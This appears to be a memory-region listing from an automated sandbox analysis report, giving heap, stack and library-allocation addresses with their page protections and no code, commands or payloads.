7FFD9B980000
trusted library allocation
page read and write
1CC3D94F000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3D88A000
heap
page read and write
1CC3D8C3000
heap
page read and write
1CC3BB58000
heap
page read and write
1CC3D96C000
heap
page read and write
1CC3D8D3000
heap
page read and write
1CC3D899000
heap
page read and write
224CD180000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
1CC3BC9D000
heap
page read and write
1CC3D983000
heap
page read and write
1CC3D99D000
heap
page read and write
1CC3D9B1000
heap
page read and write
1795691E000
heap
page read and write
224CD503000
trusted library allocation
page read and write
1CC3D8F3000
heap
page read and write
1CC3D9B1000
heap
page read and write
3889FFE000
stack
page read and write
92C31BE000
stack
page read and write
1CC3BABF000
heap
page read and write
92C2EB6000
stack
page read and write
17956FBB000
trusted library allocation
page read and write
1CC3D985000
heap
page read and write
1CC3D9B1000
heap
page read and write
92C27F3000
stack
page read and write
224CB925000
heap
page read and write
1CC3D941000
heap
page read and write
1CC3DA84000
heap
page read and write
1CC3D997000
heap
page read and write
388A4FE000
stack
page read and write
1CC3BB78000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1CC3D943000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
1CC3DAA6000
heap
page read and write
1CC3BB82000
heap
page read and write
1CC3BB82000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
1CC3D89F000
heap
page read and write
1CC3D944000
heap
page read and write
1CC3D9B1000
heap
page read and write
1CC3D8DD000
heap
page read and write
7FFD9B934000
trusted library allocation
page read and write
1CC3D9C3000
heap
page read and write
1CC3BB6F000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3BB6E000
heap
page read and write
1CC3D95D000
heap
page read and write
224CF37D000
trusted library allocation
page read and write
1CC3BB70000
heap
page read and write
1CC3D88B000
heap
page read and write
17956840000
heap
page read and write
1CC3BB58000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1CC3D8F3000
heap
page read and write
1CC3D9A8000
heap
page read and write
1CC3D9AE000
heap
page read and write
1CC3D892000
heap
page read and write
1CC3D889000
heap
page read and write
1CC3D8EB000
heap
page read and write
17956A7D000
trusted library allocation
page read and write
17956919000
heap
page read and write
1CC3D9E1000
heap
page read and write
179569CD000
trusted library allocation
page read and write
1CC3D94F000
heap
page read and write
1CC3D9A6000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
179563D0000
trusted library allocation
page read and write
1CC3D97A000
heap
page read and write
17956E6D000
trusted library allocation
page read and write
1CC3D8AE000
heap
page read and write
1CC3D9AB000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3D870000
heap
page read and write
1CC3D990000
heap
page read and write
1CC3BC9C000
heap
page read and write
17956E5E000
trusted library allocation
page read and write
1CC3D94F000
heap
page read and write
1CC3D8D4000
heap
page read and write
17956470000
trusted library allocation
page read and write
1CC3D9A8000
heap
page read and write
1CC3D946000
heap
page read and write
1CC3D98D000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
1CC3D936000
heap
page read and write
224CB84C000
heap
page read and write
1CC3BB7A000
heap
page read and write
1CC3D939000
heap
page read and write
1CC3BB6C000
heap
page read and write
1CC3D939000
heap
page read and write
1CC3D96E000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
1CC3D8E8000
heap
page read and write
179563B0000
trusted library allocation
page read and write
1CC3D951000
heap
page read and write
1CC3BA30000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3D9CA000
heap
page read and write
92C2E3E000
stack
page read and write
388A6FB000
stack
page read and write
1CC3D9AC000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1CC3D955000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3D957000
heap
page read and write
1CC3D994000
heap
page read and write
1CC3D936000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1CC3D997000
heap
page read and write
1CC3D8E0000
heap
page read and write
1CC3D966000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
1CC3D8AF000
heap
page read and write
1CC3D8E4000
heap
page read and write
1CC3BB82000
heap
page read and write
1CC3D9AD000
heap
page read and write
1CC3D9E9000
heap
page read and write
17956C5A000
trusted library allocation
page read and write
17956D70000
trusted library allocation
page read and write
1CC3D994000
heap
page read and write
1CC3D9A9000
heap
page read and write
1CC3D9DF000
heap
page read and write
1CC3D8C8000
heap
page read and write
224E5CF0000
heap
page read and write
1CC3D8B3000
heap
page read and write
17954A80000
heap
page read and write
1CC3D998000
heap
page read and write
17956AC1000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
1CC3D952000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1CC3D960000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
468BB7E000
stack
page read and write
1CC3D8C5000
heap
page read and write
1CC3DAA6000
heap
page read and write
224E57BE000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
1CC3BB82000
heap
page read and write
1CC3D947000
heap
page read and write
1CC3D992000
heap
page read and write
17956E9C000
trusted library allocation
page read and write
224CED30000
trusted library allocation
page read and write
17954BD5000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1CC3D9AB000
heap
page read and write
1CC3D8EE000
heap
page read and write
1CC3D9DB000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D8F2000
heap
page read and write
1CC3D970000
heap
page read and write
92C2AFE000
stack
page read and write
1CC3DA90000
heap
page read and write
1CC3D9DF000
heap
page read and write
224E59D8000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1CC3D998000
heap
page read and write
1CC3BB79000
heap
page read and write
1CC3D8B5000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D8F2000
heap
page read and write
1CC3BB8E000
heap
page read and write
17956A6D000
trusted library allocation
page read and write
1CC3DAB0000
heap
page read and write
1CC3D8BE000
heap
page read and write
1CC3D972000
heap
page read and write
1CC3BC9A000
heap
page read and write
17956848000
heap
page read and write
1CC3D943000
heap
page read and write
7FFD9B922000
trusted library allocation
page read and write
224CEEC4000
trusted library allocation
page read and write
1CC3D98F000
heap
page read and write
1CC3D896000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1CC3BB58000
heap
page read and write
1CC3BB83000
heap
page read and write
224CECAE000
trusted library allocation
page read and write
1CC3DAB2000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
17956A70000
trusted library allocation
page read and write
1CC3D8E6000
heap
page read and write
1CC3BC9A000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1CC3D9AC000
heap
page read and write
17956FC4000
trusted library allocation
page read and write
1CC3D9DC000
heap
page read and write
1CC3D8AE000
heap
page read and write
1CC3D9AF000
heap
page read and write
1CC3BB82000
heap
page read and write
1CC3D9A8000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
224CF4DC000
trusted library allocation
page read and write
388A0FF000
stack
page read and write
1CC3D95A000
heap
page read and write
1CC3D8B7000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3BB8C000
heap
page read and write
1CC3BB7A000
heap
page read and write
1CC3D946000
heap
page read and write
1CC3BB78000
heap
page read and write
1CC3BB70000
heap
page read and write
1CC3DA81000
heap
page read and write
1CC3DAB0000
heap
page read and write
1CC3D899000
heap
page read and write
224CD130000
heap
page readonly
224CB820000
heap
page read and write
1CC3D94F000
heap
page read and write
1CC3BC90000
heap
page read and write
1CC3BB7A000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
179549C3000
heap
page read and write
1CC3D955000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
1CC3D890000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1CC3D9BF000
heap
page read and write
1CC3DA0E000
heap
page read and write
1CC3D8DA000
heap
page read and write
1795697D000
trusted library allocation
page read and write
224E5790000
heap
page read and write
1CC3D87C000
heap
page read and write
179568FB000
heap
page read and write
1CC3D960000
heap
page read and write
1CC3D8B2000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3D9F8000
heap
page read and write
1CC3DA0E000
heap
page read and write
17956D4C000
trusted library allocation
page read and write
1CC3DA96000
heap
page read and write
1CC3D973000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1CC3BC9A000
heap
page read and write
468BCFF000
stack
page read and write
179549C9000
heap
page read and write
92C323B000
stack
page read and write
1CC3D8E4000
heap
page read and write
224CED36000
trusted library allocation
page read and write
1CC3D9EE000
heap
page read and write
1CC3D8CD000
heap
page read and write
1CC3BB75000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1CC3BB75000
heap
page read and write
1CC3D985000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3D8CE000
heap
page read and write
224CB804000
heap
page read and write
1CC3DAB1000
heap
page read and write
1CC3BABE000
heap
page read and write
1CC3D9C5000
heap
page read and write
1CC3D936000
heap
page read and write
1CC3D985000
heap
page read and write
1CC3D88C000
heap
page read and write
1CC3BB6C000
heap
page read and write
1CC3D9DB000
heap
page read and write
224E57EA000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
1CC3D98D000
heap
page read and write
1796EB30000
heap
page execute and read and write
17956A06000
trusted library allocation
page read and write
1CC3D9A5000
heap
page read and write
1CC3D982000
heap
page read and write
1CC3D8E4000
heap
page read and write
1CC3D985000
heap
page read and write
92C2BFD000
stack
page read and write
92C2B7E000
stack
page read and write
468BDFE000
stack
page read and write
1CC3D8AE000
heap
page read and write
1CC3DA84000
heap
page read and write
1CC3D9A6000
heap
page read and write
1CC3D8F3000
heap
page read and write
1CC3D966000
heap
page read and write
1CC3BB8A000
heap
page read and write
1CC3D9F9000
heap
page read and write
1CC3BB6C000
heap
page read and write
1CC3BB85000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1CC3D983000
heap
page read and write
1CC3D8C8000
heap
page read and write
1CC3D877000
heap
page read and write
1CC3BB6A000
heap
page read and write
1CC3DA12000
heap
page read and write
179563F0000
heap
page readonly
1CC3D943000
heap
page read and write
1CC3D94F000
heap
page read and write
1CC3DAA0000
heap
page read and write
1CC3BB6D000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9B79C000
trusted library allocation
page read and write
1CC3D898000
heap
page read and write
17956D35000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
1CC3D99F000
heap
page read and write
1CC3D8F4000
heap
page read and write
1CC3BB7A000
heap
page read and write
224CF18C000
trusted library allocation
page read and write
1CC3D933000
heap
page read and write
1CC3BABF000
heap
page read and write
1CC3D952000
heap
page read and write
1CC3D963000
heap
page read and write
1CC3D9BA000
heap
page read and write
1CC3BB78000
heap
page read and write
17956EA4000
trusted library allocation
page read and write
224E586F000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
224E59EC000
heap
page read and write
1CC3BB64000
heap
page read and write
1CC3D8B9000
heap
page read and write
224CB89D000
heap
page read and write
224E5A14000
heap
page read and write
1CC3BB6A000
heap
page read and write
1CC3D960000
heap
page read and write
1CC3D997000
heap
page read and write
17954BD0000
heap
page read and write
1CC3DA96000
heap
page read and write
92C313E000
stack
page read and write
224CB920000
heap
page read and write
1CC3D9AC000
heap
page read and write
1CC3D8BC000
heap
page read and write
1CC3D98D000
heap
page read and write
1CC3DA81000
heap
page read and write
1CC3D994000
heap
page read and write
1CC3D9D7000
heap
page read and write
1CC3BB20000
heap
page read and write
17954980000
heap
page read and write
179564F0000
heap
page read and write
179569FD000
trusted library allocation
page read and write
1CC3BB8C000
heap
page read and write
1CC3D99A000
heap
page read and write
1CC3D89B000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
1CC3D9A9000
heap
page read and write
1CC3D9A0000
heap
page read and write
1CC3BB7A000
heap
page read and write
1CC3D89F000
heap
page read and write
1CC3BB76000
heap
page read and write
1CC3BB84000
heap
page read and write
1CC3BB75000
heap
page read and write
1CC3D9B7000
heap
page read and write
1CC3DAA0000
heap
page read and write
1CC3BB8C000
heap
page read and write
1CC3D8B5000
heap
page read and write
1CC3D9AC000
heap
page read and write
1CC3D971000
heap
page read and write
1CC3D9B8000
heap
page read and write
1CC3D99A000
heap
page read and write
1CC3D952000
heap
page read and write
224CB7C0000
heap
page read and write
1CC3D9BC000
heap
page read and write
1CC3D89E000
heap
page read and write
1CC3D883000
heap
page read and write
1CC3BB7A000
heap
page read and write
468C0BE000
stack
page read and write
1CC3D8EC000
heap
page read and write
1CC3D8C4000
heap
page read and write
1CC3D955000
heap
page read and write
There are 822 hidden memdumps, click here to show them.